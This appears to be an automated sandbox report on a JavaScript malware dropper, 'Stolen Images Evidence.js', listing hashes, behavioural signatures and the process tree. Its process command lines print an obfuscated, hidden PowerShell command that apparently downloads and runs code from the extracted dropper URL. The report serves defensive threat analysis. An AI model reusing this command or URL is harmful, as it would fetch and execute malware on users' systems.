Analysis
- max time kernel: 8s
- max time network: 11s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 27-07-2021 19:27
Static task: static1

Behavioral task: behavioral1
- Sample: Stolen Images Evidence.js
- Resource: win7v20210410 (windows7_x64)
- 0 signatures
- 0 seconds

Behavioral task: behavioral2
- Sample: Stolen Images Evidence.js
- Resource: win10v20210408 (windows10_x64)
- 0 signatures
- 0 seconds
General
- Target: Stolen Images Evidence.js
- Size: 23KB
- MD5: 86c4c4a86388ab87b8166563fc6080b9
- SHA1: a22941692d34245363e1ed75a2e55f9e439f3e2d
- SHA256: 6961814b2c02d34f6eb8da26d59c3e555763f28680ed67bd7c6b30994dba74d3
- SHA512: 9005d46de018ce0409a2a8f0bd7afe611636c88e5f503b4d0e22ef72dbec7b0240a3f1c12b6711a07dc839d04225df5f3fcee4db8c68edf4eb8a58a7aef71ebc
- Score: 10/10
Malware Config
- Extracted
- Language: ps1
- Deobfuscated: yes
- URLs (ps1.dropper): http://munardis.space/222g100/index.php
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes (flow / pid / process):
  - flow 6, pid 1736, powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid / process):
  - pid 1736, powershell.exe
  - pid 1736, powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description / pid / process):
  - Token: SeDebugPrivilege, pid 1736, powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description / pid / process / target process):
  - PID 1116 wrote to memory of 1972, pid 1116, wscript.exe -> cmd.exe
  - PID 1116 wrote to memory of 1972, pid 1116, wscript.exe -> cmd.exe
  - PID 1116 wrote to memory of 1972, pid 1116, wscript.exe -> cmd.exe
  - PID 1972 wrote to memory of 1736, pid 1972, cmd.exe -> powershell.exe
  - PID 1972 wrote to memory of 1736, pid 1972, cmd.exe -> powershell.exe
  - PID 1972 wrote to memory of 1736, pid 1972, cmd.exe -> powershell.exe
Processes
1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1116-60-0x000007FEFC301000-0x000007FEFC303000-memory.dmp (Filesize: 8KB)
- memory/1736-62-0x0000000000000000-mapping.dmp
- memory/1736-64-0x00000000021F0000-0x00000000021F1000-memory.dmp (Filesize: 4KB)
- memory/1736-65-0x000000001AC10000-0x000000001AC11000-memory.dmp (Filesize: 4KB)
- memory/1736-66-0x00000000025D0000-0x00000000025D1000-memory.dmp (Filesize: 4KB)
- memory/1736-67-0x000000001AB90000-0x000000001AB92000-memory.dmp (Filesize: 8KB)
- memory/1736-68-0x000000001AB94000-0x000000001AB96000-memory.dmp (Filesize: 8KB)
- memory/1736-69-0x0000000002340000-0x0000000002341000-memory.dmp (Filesize: 4KB)
- memory/1736-70-0x000000001C410000-0x000000001C411000-memory.dmp (Filesize: 4KB)
- memory/1972-61-0x0000000000000000-mapping.dmp